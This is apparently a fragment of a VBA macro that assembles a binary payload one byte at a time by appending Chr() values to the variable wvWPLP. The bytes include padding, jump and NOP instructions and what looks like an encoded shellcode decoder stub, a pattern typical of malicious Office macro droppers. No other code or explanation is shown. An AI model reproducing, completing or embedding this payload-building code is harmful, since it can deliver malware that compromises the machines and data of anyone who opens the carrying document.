wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(32)&Chr(64)&Chr(0)&Chr(255)&Chr(224)&Chr(144)&Chr(255)&Chr(37)&Chr(56)&Chr(48)&Chr(64)&Chr(0)&Chr(144)&Chr(144)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(190)&Chr(101)&Chr(81)&Chr(244)&Chr(228)&Chr(221)&Chr(199)&Chr(217)&Chr(116)&Chr(36)&Chr(244)&Chr(95)&Chr(49)&Chr(201)&Chr(102)&Chr(185)&Chr(4)&Chr(2)&Chr(49)&Chr(119)&Chr(21)&Chr(3)&Chr(119)&Chr(21)&Chr(131)&Chr(199)&Chr(97)&Chr(179)&Chr(1)&Chr(213)&Chr(169)&Chr(91)&Chr(226)&Chr(6)&Chr(105)&Chr(156)&Chr(150)&Chr(217)&Chr(89)&Chr(248)&Chr(223)&Chr(6)&Chr(101)&Chr(232)&Chr(98)&Chr(70)&Chr(149)&Chr(233)&Chr(2)&Chr(206)&Chr(112)&Chr(216)&Chr(2)&Chr(180)&Chr(241)&Chr(75)&Chr(179)&Chr(190)&Chr(87)&Chr(96)&Chr(56)&Chr(146)&Chr(67)&Chr(243)&Chr(76)&Chr(59)&Chr(100)&Chr(180)&Chr(251)&Chr(29)&Chr(75)&Chr(69)&Chr(87)&Chr(93)&Chr(202)&Chr(197) wvWPLP=wvWPLP&Chr(170)&Chr(178)&Chr(44)&Chr(247)&Chr(100)&Chr(199)&Chr(45)&Chr(48)&Chr(152)&Chr(42)&Chr(127)&Chr(233)&Chr(214)&Chr(153)&Chr(111)&Chr(158)&Chr(163)&Chr(33)&Chr(4)&Chr(236)&Chr(34)&Chr(34)&Chr(249)&Chr(165)&Chr(69)&Chr(3)&Chr(172)&Chr(190)&Chr(31)&Chr(131)&Chr(79)&Chr(18)&Chr(20)&Chr(138)&Chr(87)&Chr(119)&Chr(17)&Chr(68)&Chr(236)&Chr(67)&Chr(237)&Chr(87)&Chr(36)&Chr(154)&Chr(14)&Chr(251)&Chr(9)&Chr(18)&Chr(253)&Chr(5)&Chr(78)&Chr(149)&Chr(30)&Chr(112)&Chr(166)&Chr(229)&Chr(163)&Chr(131)&Chr(125)&Chr(151)&Chr(127)&Chr(1)&Chr(101)&Chr(63)&Chr(11)&Chr(177)&Chr(65)&Chr(193)&Chr(216)&Chr(36)&Chr(2)&Chr(205)&Chr(149)&Chr(35)&Chr(76)&Chr(210)&Chr(40)&Chr(231)&Chr(231)&Chr(238)&Chr(161)&Chr(6)&Chr(39)&Chr(103)&Chr(241)&Chr(44)&Chr(227)&Chr(35)&Chr(161)&Chr(77)&Chr(178)&Chr(137)&Chr(4)&Chr(113)&Chr(164)&Chr(113)&Chr(248)&Chr(215)&Chr(175)&Chr(156) 
wvWPLP=wvWPLP&Chr(237)&Chr(101)&Chr(242)&Chr(200)&Chr(194)&Chr(71)&Chr(12)&Chr(9)&Chr(77)&Chr(223)&Chr(127)&Chr(59)&Chr(210)&Chr(75)&Chr(23)&Chr(119)&Chr(155)&Chr(85)&Chr(224)&Chr(14)&Chr(139)&Chr(101)&Chr(62)&Chr(168)&Chr(220)&Chr(155)&Chr(190)&Chr(201)&Chr(245)&Chr(95)&Chr(234)&Chr(153)&Chr(109)&Chr(73)&Chr(146)&Chr(113)&Chr(110)&Chr(118)&Chr(71)&Chr(239)&Chr(100)&Chr(224)&Chr(167)&Chr(88)&Chr(83)&Chr(2)&Chr(79)&Chr(155)&Chr(164)&Chr(243)&Chr(211)&Chr(18)&Chr(66)&Chr(163)&Chr(187)&Chr(116)&Chr(219)&Chr(4)&Chr(107)&Chr(53)&Chr(139)&Chr(236)&Chr(97)&Chr(186)&Chr(244)&Chr(13)&Chr(138)&Chr(16)&Chr(157)&Chr(164)&Chr(100)&Chr(205)&Chr(245)&Chr(80)&Chr(29)&Chr(84)&Chr(141)&Chr(193)&Chr(226)&Chr(66)&Chr(235)&Chr(194)&Chr(104)&Chr(103)&Chr(11)&Chr(140)&Chr(152)&Chr(2)&Chr(31)&Chr(249)&Chr(255)&Chr(236)&Chr(223)&Chr(250)&Chr(149)&Chr(236)&Chr(181)&Chr(254)&Chr(63)&Chr(186) wvWPLP=wvWPLP&Chr(33)&Chr(253)&Chr(102)&Chr(140)&Chr(237)&Chr(254)&Chr(77)&Chr(142)&Chr(234)&Chr(1)&Chr(19)&Chr(167)&Chr(129)&Chr(52)&Chr(129)&Chr(135)&Chr(253)&Chr(56)&Chr(69)&Chr(8)&Chr(254)&Chr(110)&Chr(15)&Chr(8)&Chr(150)&Chr(214)&Chr(107)&Chr(91)&Chr(131)&Chr(24)&Chr(166)&Chr(207)&Chr(24)&Chr(141)&Chr(72)&Chr(166)&Chr(205)&Chr(6)&Chr(32)&Chr(68)&Chr(43)&Chr(96)&Chr(239)&Chr(183)&Chr(30)&Chr(242)&Chr(247)&Chr(72)&Chr(220)&Chr(221)&Chr(95)&Chr(33)&Chr(30)&Chr(94)&Chr(95)&Chr(177)&Chr(116)&Chr(94)&Chr(15)&Chr(217)&Chr(131)&Chr(113)&Chr(160)&Chr(41)&Chr(107)&Chr(88)&Chr(233)&Chr(33)&Chr(230)&Chr(13)&Chr(88)&Chr(211)&Chr(247)&Chr(7)&Chr(60)&Chr(77)&Chr(247)&Chr(164)&Chr(228)&Chr(126)&Chr(130)&Chr(197)&Chr(27)&Chr(127)&Chr(115)&Chr(204)&Chr(120)&Chr(127)&Chr(115)&Chr(240)&Chr(127)&Chr(67)&Chr(165)&Chr(201)&Chr(10)&Chr(130)&Chr(117)&Chr(110)&Chr(4)&Chr(177) 
wvWPLP=wvWPLP&Chr(216)&Chr(199)&Chr(142)&Chr(186)&Chr(79)&Chr(23)&Chr(155)&Chr(216)&Chr(243)&Chr(139)&Chr(45)&Chr(122)&Chr(3)&Chr(219)&Chr(41)&Chr(204)&Chr(172)&Chr(252)&Chr(226)&Chr(254)&Chr(31)&Chr(68)&Chr(176)&Chr(171)&Chr(187)&Chr(179)&Chr(7)&Chr(101)&Chr(40)&Chr(19)&Chr(241)&Chr(206)&Chr(233)&Chr(170)&Chr(162)&Chr(130)&Chr(243)&Chr(46)&Chr(241)&Chr(31)&Chr(166)&Chr(227)&Chr(79)&Chr(218)&Chr(155)&Chr(23)&Chr(216)&Chr(77)&Chr(13)&Chr(29)&Chr(233)&Chr(245)&Chr(118)&Chr(75)&Chr(17)&Chr(93)&Chr(97)&Chr(210)&Chr(181)&Chr(130)&Chr(180)&Chr(249)&Chr(123)&Chr(71)&Chr(184)&Chr(118)&Chr(249)&Chr(201)&Chr(231)&Chr(125)&Chr(151)&Chr(72)&Chr(157)&Chr(75)&Chr(41)&Chr(139)&Chr(112)&Chr(44)&Chr(181)&Chr(145)&Chr(197)&Chr(211)&Chr(247)&Chr(1)&Chr(34)&Chr(209)&Chr(67)&Chr(164)&Chr(233)&Chr(33)&Chr(82)&Chr(224)&Chr(101)&Chr(59)&Chr(177)&Chr(181)&Chr(208)&Chr(202)&Chr(205)&Chr(66) wvWPLP=wvWPLP&Chr(50)&Chr(53)&Chr(181)&Chr(169)&Chr(48)&Chr(229)&Chr(163)&Chr(77)&Chr(164)&Chr(123)&Chr(164)&Chr(64)&Chr(219)&Chr(111)&Chr(224)&Chr(32)&Chr(191)&Chr(171)&Chr(58)&Chr(166)&Chr(181)&Chr(240)&Chr(62)&Chr(98)&Chr(207)&Chr(160)&Chr(94)&Chr(255)&Chr(211)&Chr(200)&Chr(147)&Chr(102)&Chr(104)&Chr(92)&Chr(178)&Chr(210)&Chr(138)&Chr(51)&Chr(3)&Chr(27)&Chr(244)&Chr(110)&Chr(214)&Chr(166)&Chr(52)&Chr(175)&Chr(168)&Chr(115)&Chr(191)&Chr(80)&Chr(54)&Chr(30)&Chr(166)&Chr(127)&Chr(37)&Chr(209)&Chr(112)&Chr(103)&Chr(141)&Chr(204)&Chr(82)&Chr(0)&Chr(255)&Chr(79)&Chr(9)&Chr(26)&Chr(0)&Chr(82)&Chr(121)&Chr(55)&Chr(50)&Chr(25)&Chr(248)&Chr(220)&Chr(8)&Chr(22)&Chr(129)&Chr(147)&Chr(93)&Chr(71)&Chr(146)&Chr(142)&Chr(170)&Chr(107)&Chr(223)&Chr(110)&Chr(86)&Chr(181)&Chr(178)&Chr(48)&Chr(125)&Chr(179)&Chr(63)&Chr(216)&Chr(201)&Chr(72)&Chr(21)&Chr(26)&Chr(172)&Chr(248) 
wvWPLP=wvWPLP&Chr(222)&Chr(164)&Chr(1)&Chr(147)&Chr(215)&Chr(120)&Chr(59)&Chr(103)&Chr(95)&Chr(232)&Chr(56)&Chr(138)&Chr(17)&Chr(194)&Chr(223)&Chr(51)&Chr(210)&Chr(21)&Chr(7)&Chr(208)&Chr(167)&Chr(1)&Chr(57)&Chr(43)&Chr(242)&Chr(79)&Chr(15)&Chr(147)&Chr(234)&Chr(19)&Chr(204)&Chr(218)&Chr(162)&Chr(124)&Chr(63)&Chr(69)&Chr(75)&Chr(117)&Chr(183)&Chr(72)&Chr(223)&Chr(103)&Chr(23)&Chr(214)&Chr(162)&Chr(225)&Chr(103)&Chr(115)&Chr(88)&Chr(113)&Chr(17)&Chr(11)&Chr(50)&Chr(234)&Chr(70)&Chr(67)&Chr(50)&Chr(232)&Chr(62)&Chr(18)&Chr(152)&Chr(142)&Chr(197)&Chr(106)&Chr(93)&Chr(50)&Chr(8)&Chr(198)&Chr(225)&Chr(13)&Chr(109)&Chr(252)&Chr(73)&Chr(151)&Chr(153)&Chr(127)&Chr(127)&Chr(69)&Chr(186)&Chr(8)&Chr(232)&Chr(98)&Chr(79)&Chr(63)&Chr(153)&Chr(156)&Chr(143)&Chr(225)&Chr(170)&Chr(254)&Chr(254)&Chr(162)&Chr(235)&Chr(221)&Chr(217)&Chr(142)&Chr(129)&Chr(74)&Chr(46)&Chr(112) wvWPLP=wvWPLP&Chr(161)&Chr(110)&Chr(25)&Chr(81)&Chr(253)&Chr(154)&Chr(98)&Chr(175)&Chr(106)&Chr(6)&Chr(122)&Chr(40)&Chr(89)&Chr(165)&Chr(26)&Chr(152)&Chr(120)&Chr(243)&Chr(105)&Chr(249)&Chr(170)&Chr(215)&Chr(116)&Chr(161)&Chr(118)&Chr(117)&Chr(6)&Chr(40)&Chr(246)&Chr(190)&Chr(242)&Chr(157)&Chr(39)&Chr(121)&Chr(253)&Chr(100)&Chr(44)&Chr(179)&Chr(60)&Chr(95)&Chr(90)&Chr(248)&Chr(181)&Chr(238)&Chr(24)&Chr(40)&Chr(247)&Chr(134)&Chr(234)&Chr(88)&Chr(195)&Chr(234)&Chr(121)&Chr(31)&Chr(176)&Chr(11)&Chr(68)&Chr(142)&Chr(149)&Chr(93)&Chr(252)&Chr(212)&Chr(86)&Chr(73)&Chr(77)&Chr(38)&Chr(81)&Chr(24)&Chr(68)&Chr(160)&Chr(226)&Chr(19)&Chr(100)&Chr(99)&Chr(10)&Chr(205)&Chr(76)&Chr(86)&Chr(76)&Chr(126)&Chr(228)&Chr(246)&Chr(175)&Chr(107)&Chr(39)&Chr(137)&Chr(254)&Chr(140)&Chr(60)&Chr(29)&Chr(112)&Chr(111)&Chr(118)&Chr(42)&Chr(193)&Chr(68)&Chr(252)&Chr(57)&Chr(191)&Chr(136) 
wvWPLP=wvWPLP&Chr(152)&Chr(180)&Chr(239)&Chr(142)&Chr(103)&Chr(225)&Chr(33)&Chr(1)&Chr(25)&Chr(38)&Chr(181)&Chr(87)&Chr(205)&Chr(123)&Chr(154)&Chr(144)&Chr(129)&Chr(14)&Chr(17)&Chr(96)&Chr(7)&Chr(144)&Chr(16)&Chr(226)&Chr(176)&Chr(66)&Chr(242)&Chr(93)&Chr(177)&Chr(220)&Chr(112)&Chr(41)&Chr(24)&Chr(180)&Chr(206)&Chr(91)&Chr(246)&Chr(14)&Chr(217)&Chr(194)&Chr(29)&Chr(151)&Chr(136)&Chr(26)&Chr(169)&Chr(145)&Chr(50)&Chr(224)&Chr(65)&Chr(180)&Chr(73)&Chr(204)&Chr(214)&Chr(230)&Chr(209)&Chr(251)&Chr(96)&Chr(178)&Chr(53)&Chr(232)&Chr(47)&Chr(183)&Chr(179)&Chr(125)&Chr(197)&Chr(58)&Chr(95)&Chr(248)&Chr(85)&Chr(176)&Chr(80)&Chr(113)&Chr(47)&Chr(244)&Chr(10)&Chr(6)&Chr(67)&Chr(191)&Chr(107)&Chr(191)&Chr(234)&Chr(34)&Chr(2)&Chr(12)&Chr(160)&Chr(199)&Chr(50)&Chr(54)&Chr(82)&Chr(54)&Chr(42)&Chr(221)&Chr(38)&Chr(115)&Chr(149)&Chr(5)&Chr(112)&Chr(166)&Chr(233)&Chr(3) wvWPLP=wvWPLP&Chr(41)&Chr(9)&Chr(252)&Chr(185)&Chr(54)&Chr(244)&Chr(186)&Chr(241)&Chr(126)&Chr(46)&Chr(80)&Chr(4)&Chr(3)&Chr(152)&Chr(49)&Chr(179)&Chr(200)&Chr(104)&Chr(56)&Chr(149)&Chr(125)&Chr(103)&Chr(148)&Chr(9)&Chr(102)&Chr(147)&Chr(227)&Chr(255)&Chr(85)&Chr(57)&Chr(190)&Chr(161)&Chr(99)&Chr(133)&Chr(46)&Chr(208)&Chr(93)&Chr(115)&Chr(78)&Chr(87)&Chr(225)&Chr(132)&Chr(173)&Chr(198)&Chr(89)&Chr(133)&Chr(194)&Chr(113)&Chr(88)&Chr(88)&Chr(228)&Chr(134)&Chr(80)&Chr(176)&Chr(94)&Chr(42)&Chr(142)&Chr(19)&Chr(233)&Chr(98)&Chr(234)&Chr(202)&Chr(56)&Chr(228)&Chr(127)&Chr(5)&Chr(51)&Chr(54)&Chr(72)&Chr(86)&Chr(174)&Chr(61)&Chr(167)&Chr(124)&Chr(66)&Chr(169)&Chr(159)&Chr(195)&Chr(86)&Chr(170)&Chr(227)&Chr(89)&Chr(48)&Chr(20)&Chr(249)&Chr(158)&Chr(20)&Chr(42)&Chr(130)&Chr(159)&Chr(115)&Chr(185)&Chr(223)&Chr(69)&Chr(53)&Chr(252)&Chr(51)&Chr(20)&Chr(47)&Chr(177) 
wvWPLP=wvWPLP&Chr(23)&Chr(130)&Chr(38)&Chr(166)&Chr(90)&Chr(126)&Chr(243)&Chr(202)&Chr(243)&Chr(254)&Chr(252)&Chr(195)&Chr(174)&Chr(62)&Chr(109)&Chr(186)&Chr(231)&Chr(115)&Chr(77)&Chr(26)&Chr(253)&Chr(179)&Chr(195)&Chr(54)&Chr(34)&Chr(69)&Chr(40)&Chr(139)&Chr(92)&Chr(68)&Chr(187)&Chr(17)&Chr(121)&Chr(69)&Chr(118)&Chr(194)&Chr(119)&Chr(191)&Chr(97)&Chr(108)&Chr(55)&Chr(30)&Chr(226)&Chr(100)&Chr(52)&Chr(195)&Chr(238)&Chr(55)&Chr(144)&Chr(177)&Chr(222)&Chr(61)&Chr(1)&Chr(209)&Chr(83)&Chr(41)&Chr(93)&Chr(22)&Chr(55)&Chr(24)&Chr(81)&Chr(75)&Chr(127)&Chr(198)&Chr(161)&Chr(15)&Chr(34)&Chr(232)&Chr(188)&Chr(202)&Chr(10)&Chr(194)&Chr(163)&Chr(219)&Chr(51)&Chr(116)&Chr(139)&Chr(228)&Chr(75)&Chr(120)&Chr(99)&Chr(81)&Chr(72)&Chr(177)&Chr(229)&Chr(197)&Chr(79)&Chr(171)&Chr(225)&Chr(253)&Chr(132)&Chr(41)&Chr(235)&Chr(75)&Chr(142)&Chr(80)&Chr(131)&Chr(116)&Chr(244)&Chr(109) wvWPLP=wvWPLP&Chr(181)&Chr(113)&Chr(230)&Chr(145)&Chr(64)&Chr(197)&Chr(117)&Chr(181)&Chr(84)&Chr(209)&Chr(226)&Chr(22)&Chr(146)&Chr(89)&Chr(182)&Chr(6)&Chr(159)&Chr(250)&Chr(138)&Chr(80)&Chr(88)&Chr(231)&Chr(63)&Chr(80)&Chr(19)&Chr(249)&Chr(241)&Chr(180)&Chr(163)&Chr(87)&Chr(160)&Chr(206)&Chr(88)&Chr(118)&Chr(15)&Chr(196)&Chr(168)&Chr(193)&Chr(92)&Chr(182)&Chr(156)&Chr(79)&Chr(137)&Chr(155)&Chr(162)&Chr(112)&Chr(132)&Chr(228)&Chr(93)&Chr(57)&Chr(205)&Chr(40)&Chr(83)&Chr(234)&Chr(153)&Chr(214)&Chr(185)&Chr(255)&Chr(40)&Chr(170)&Chr(102)&Chr(49)&Chr(253)&Chr(129)&Chr(54)&Chr(195)&Chr(192)&Chr(123)&Chr(196)&Chr(121)&Chr(5)&Chr(91)&Chr(154)&Chr(73)&Chr(79)&Chr(37)&Chr(106)&Chr(11)&Chr(60)&Chr(72)&Chr(251)&Chr(100)&Chr(98)&Chr(3)&Chr(56)&Chr(251)&Chr(4)&Chr(37)&Chr(160)&Chr(40)&Chr(111)&Chr(81)&Chr(137)&Chr(79)&Chr(81)&Chr(6)&Chr(104)&Chr(204)&Chr(47)&Chr(19) 
wvWPLP=wvWPLP&Chr(119)&Chr(185)&Chr(209)&Chr(225)&Chr(5)&Chr(207)&Chr(38)&Chr(120)&Chr(90)&Chr(243)&Chr(192)&Chr(188)&Chr(184)&Chr(12)&Chr(211)&Chr(233)&Chr(138)&Chr(157)&Chr(7)&Chr(7)&Chr(247)&Chr(71)&Chr(242)&Chr(253)&Chr(193)&Chr(236)&Chr(83)&Chr(169)&Chr(8)&Chr(31)&Chr(19)&Chr(85)&Chr(249)&Chr(32)&Chr(221)&Chr(134)&Chr(88)&Chr(76)&Chr(185)&Chr(82)&Chr(126)&Chr(166)&Chr(49)&Chr(125)&Chr(50)&Chr(164)&Chr(97)&Chr(141)&Chr(82)&Chr(179)&Chr(79)&Chr(254)&Chr(133)&Chr(105)&Chr(99)&Chr(238)&Chr(47)&Chr(150)&Chr(84)&Chr(114)&Chr(179)&Chr(144)&Chr(42)&Chr(78)&Chr(125)&Chr(145)&Chr(157)&Chr(43)&Chr(86)&Chr(225)&Chr(19)&Chr(82)&Chr(186)&Chr(176)&Chr(116)&Chr(56)&Chr(163)&Chr(216)&Chr(119)&Chr(196)&Chr(186)&Chr(220)&Chr(25)&Chr(75)&Chr(58)&Chr(9)&Chr(185)&Chr(14)&Chr(121)&Chr(108)&Chr(135)&Chr(225)&Chr(20)&Chr(200)&Chr(56)&Chr(35)&Chr(148)&Chr(98)&Chr(185)&Chr(127) wvWPLP=wvWPLP&Chr(128)&Chr(248)&Chr(252)&Chr(151)&Chr(64)&Chr(193)&Chr(62)&Chr(250)&Chr(184)&Chr(148)&Chr(155)&Chr(168)&Chr(67)&Chr(245)&Chr(156)&Chr(43)&Chr(36)&Chr(152)&Chr(38)&Chr(53)&Chr(167)&Chr(31)&Chr(79)&Chr(254)&Chr(229)&Chr(134)&Chr(175)&Chr(48)&Chr(196)&Chr(3)&Chr(225)&Chr(33)&Chr(90)&Chr(168)&Chr(73)&Chr(52)&Chr(128)&Chr(184)&Chr(120)&Chr(191)&Chr(238)&Chr(234)&Chr(53)&Chr(14)&Chr(107)&Chr(171)&Chr(231)&Chr(3)&Chr(152)&Chr(251)&Chr(113)&Chr(21)&Chr(39)&Chr(88)&Chr(32)&Chr(44)&Chr(81)&Chr(205)&Chr(126)&Chr(187)&Chr(180)&Chr(179)&Chr(135)&Chr(87)&Chr(56)&Chr(182)&Chr(235)&Chr(128)&Chr(51)&Chr(84)&Chr(231)&Chr(190)&Chr(55)&Chr(131)&Chr(254)&Chr(4)&Chr(243)&Chr(220)&Chr(173)&Chr(254)&Chr(251)&Chr(40)&Chr(129)&Chr(31)&Chr(249)&Chr(49)&Chr(87)&Chr(186)&Chr(161)&Chr(24)&Chr(92)&Chr(3)&Chr(35)&Chr(52)&Chr(92)&Chr(40)&Chr(20)&Chr(159)&Chr(73)&Chr(41) 
wvWPLP=wvWPLP&Chr(6)&Chr(60)&Chr(9)&Chr(199)&Chr(142)&Chr(103)&Chr(36)&Chr(25)&Chr(138)&Chr(66)&Chr(169)&Chr(52)&Chr(86)&Chr(99)&Chr(192)&Chr(51)&Chr(89)&Chr(32)&Chr(192)&Chr(228)&Chr(149)&Chr(3)&Chr(13)&Chr(29)&Chr(54)&Chr(213)&Chr(197)&Chr(83)&Chr(61)&Chr(147)&Chr(187)&Chr(196)&Chr(6)&Chr(201)&Chr(16)&Chr(103)&Chr(62)&Chr(147)&Chr(48)&Chr(189)&Chr(222)&Chr(63)&Chr(28)&Chr(18)&Chr(25)&Chr(86)&Chr(160)&Chr(151)&Chr(160)&Chr(212)&Chr(18)&Chr(37)&Chr(161)&Chr(231)&Chr(159)&Chr(39)&Chr(134)&Chr(206)&Chr(84)&Chr(36)&Chr(206)&Chr(135)&Chr(166)&Chr(192)&Chr(1)&Chr(78)&Chr(26)&Chr(101)&Chr(254)&Chr(49)&Chr(53)&Chr(34)&Chr(73)&Chr(211)&Chr(150)&Chr(22)&Chr(116)&Chr(97)&Chr(80)&Chr(205)&Chr(168)&Chr(44)&Chr(99)&Chr(185)&Chr(206)&Chr(44)&Chr(7)&Chr(50)&Chr(105)&Chr(234)&Chr(9)&Chr(6)&Chr(13)&Chr(107)&Chr(123)&Chr(216)&Chr(183)&Chr(39)&Chr(159)&Chr(253) wvWPLP=wvWPLP&Chr(107)&Chr(117)&Chr(167)&Chr(122)&Chr(25)&Chr(197)&Chr(171)&Chr(250)&Chr(180)&Chr(18)&Chr(16)&Chr(117)&Chr(252)&Chr(76)&Chr(17)&Chr(70)&Chr(42)&Chr(112)&Chr(19)&Chr(131)&Chr(252)&Chr(38)&Chr(79)&Chr(0)&Chr(193)&Chr(56)&Chr(101)&Chr(50)&Chr(240)&Chr(107)&Chr(146)&Chr(129)&Chr(164)&Chr(131)&Chr(39)&Chr(117)&Chr(231)&Chr(7)&Chr(208)&Chr(241)&Chr(90)&Chr(211)&Chr(34)&Chr(106)&Chr(39)&Chr(72)&Chr(92)&Chr(28)&Chr(227)&Chr(169)&Chr(229)&Chr(235)&Chr(183)&Chr(241)&Chr(228)&Chr(186)&Chr(191)&Chr(12)&Chr(151)&Chr(52)&Chr(104)&Chr(161)&Chr(84)&Chr(47)&Chr(169)&Chr(236)&Chr(7)&Chr(90)&Chr(193)&Chr(65)&Chr(191)&Chr(87)&Chr(206)&Chr(214)&Chr(57)&Chr(159)&Chr(72)&Chr(48)&Chr(185)&Chr(149)&Chr(4)&Chr(107)&Chr(46)&Chr(228)&Chr(81)&Chr(110)&Chr(57)&Chr(2)&Chr(232)&Chr(164)&Chr(133)&Chr(117)&Chr(61)&Chr(232)&Chr(11)&Chr(39)&Chr(77)&Chr(198)&Chr(86)&Chr(155) 
